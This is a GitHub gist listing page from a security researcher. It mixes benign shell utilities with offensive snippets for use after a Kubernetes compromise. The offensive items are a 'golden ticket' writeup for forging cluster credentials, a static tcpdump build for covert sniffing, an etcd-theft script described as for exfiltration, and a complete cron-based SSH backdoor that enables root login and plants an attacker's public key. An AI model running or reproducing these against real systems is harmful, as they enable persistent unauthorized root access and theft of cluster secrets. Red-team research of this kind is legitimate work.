Skip to content

Instantly share code, notes, and snippets.

View grahamhelton's full-sized avatar

Graham Helton grahamhelton

143 followers · 1 following
View GitHub Profile
@grahamhelton
grahamhelton / operationalize.md
Last active February 27, 2025 19:15
Kubernetes Golden Ticket

kubernetes golden tickets

Allows you to forge Kubernetes administrative user certificates, node certificates, and ServiceAccount tokens

Scripted solution

The following is a few bash oneliners to operationalize k8s spoofilizer. Assumptions made in this are:

  1. You've compromised a non-cloud provider managed Kubernetes cluster
  2. You have access to (typically in /etc/kubernetes/pki/, In minikube it's /var/lib/minikube/certs):
@grahamhelton
grahamhelton / shutdown-when-idle.sh
Last active December 19, 2024 21:12
This script creates a systemd timer that shuts down a machine if there are no active connections to it. Default is 30 minutes. Must run as root.
#!/bin/bash
## Colors
BOLD=$(tput bold)
NOCOLOR=$(tput sgr0)
RED=$(tput setaf 1)
GREEN=$(tput setaf 2)
YELLOW=$(tput setaf 3)
BLUE=$(tput setaf 4)
PURPLE=$(tput setaf 5)
CYAN=$(tput setaf 6)
@grahamhelton
grahamhelton / gist:6cef7df2cc059078ae0702492b6b9f1f
Created September 10, 2024 02:54
#!/bin/bash
# This script compiles tcpdump as a static binary
# Useful for running in pods or other places you shouldn't be
GREEN=$(tput setaf 2)
NOCOLOR=$(tput sgr0)
TICK="$NOCOLOR[$GREEN+$NOCOLOR] "
spin() {
@grahamhelton
grahamhelton / cool bash tricks.md
Created June 23, 2024 18:55
Quick notes from looking at bash scripts that are way better than mine

Learning from well written bash

These are just some quick notes I jotted down when looking at https://github.com/WoozyMasta/kube-dump/blob/master/kube-dump, theres lots of cool little tricks within the initilization of the script.

Notes

#!/usr/bin/env bash
  • Running /usr/bin/env bash looks for the default version of the program in your environment. This way if bash is not in the default /bin/bash location (such as on [[nixos]]), it will still find bash.
    • Interestingly, there is a small security concern. If someone can get their exectuable for bash in your path it might be executed
@grahamhelton
grahamhelton / steal_etcd.sh
Created June 7, 2024 19:25
Quick bash script to steal an etcd database
# This script attempts to take a snapshot of the kubernetes etcd database for exfiltration
# This should be run post-compromise of a node
#!/usr/bin/env bash
NOCOLOR=$(tput sgr0)
RED=$(tput setaf 1)
GREEN=$(tput setaf 2)
BLUE=$(tput setaf 4)
YELLOW=$(tput setaf 3)
TICK="$NOCOLOR[$GREEN+$NOCOLOR] "
@grahamhelton
grahamhelton / ubuntu_prep.sh
Last active May 29, 2024 15:34
Proxmox: Prep ubuntu cloud image for use with terraform in a proxmox lab
# SSH to your proxmox server
ssh root@<proxmox_server>
# Update things and install libguestfs-tools
sudo apt update -y && sudo apt install libguestfs-tools -y
# Download ubuntu 20.04 image
# Alternatively, find the image you want from https://cloud-images.ubuntu.com/
wget https://cloud-images.ubuntu.com/focal/20240524/focal-server-cloudimg-amd64.img
@grahamhelton
grahamhelton / gist:b78f9238544e63c0046b4a20e3aed188
Last active September 12, 2024 12:06
Cron.d ssh backdoor
# Place our backdoor script into /tmp/ssh.sh
# This will be ran by cron
# Run one line at a time. Do not try to paste entire command in at once....
cat << EOF > /tmp/ssh.sh
apt update ; apt install openssh-server -y ; mkdir -p /var/run/sshd && sed -i 's/\#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd ; mkdir -p /root/.ssh && touch /root/.ssh/authorized_keys ; echo "ENTER YOUR PUBLIC KEY HERE" >> /root/.ssh/authorized_keys ; /usr/sbin/service ssh restart
# Then type EOF and press enter
# Ensure the script has execute permissions
chmod +x /tmp/ssh.sh
@grahamhelton
grahamhelton / gist:3c9a1e3184de209cf505fa83444ac5f5
Last active March 18, 2024 08:43
Bash colors template
#! /bin/bash
# NOTE: To make use of a wider color pallet set the TERM enviornment variable TERM=xterm-256color
# Colors
BOLD=$(tput bold)
NOCOLOR=$(tput sgr0)
RED=$(tput setaf 1)
GREEN=$(tput setaf 2)
YELLOW=$(tput setaf 3)
@grahamhelton
grahamhelton / dockerload.sh
Last active May 30, 2024 23:55
Build tool into docker image
# Install certipy
apt update -y &> /dev/null && apt upgrade -y &> /dev/null && apt install -y python3 python3-pip &> /dev/null && pip3 install certipy-ad &> /dev/null ; echo -e "\033[0;32m - Certipy installed \033[0m"
# List containers, identify container id
sudo docker container ls
# Stage the current container into an image
sudo docker commit <container_id> <image_name>
# Save the image as a .tar file
@grahamhelton
grahamhelton / getsha1
Created January 21, 2024 04:41
Grabs the sha1sum of a remote github repo and then prints the nixos configuration to download it on rebuild
if [ $# -ne 2 ]
then
echo "Usage: getsha1 <github_url> <path_to_store_file>
IE: getsha1 https://github.com/danielmiessler/SecLists Documents/wordlists/seclists"
exit
fi
github="$1"
sha1=$(git ls-remote $1 | awk '{print $1}' | head -n 1)
echo "
home.file = {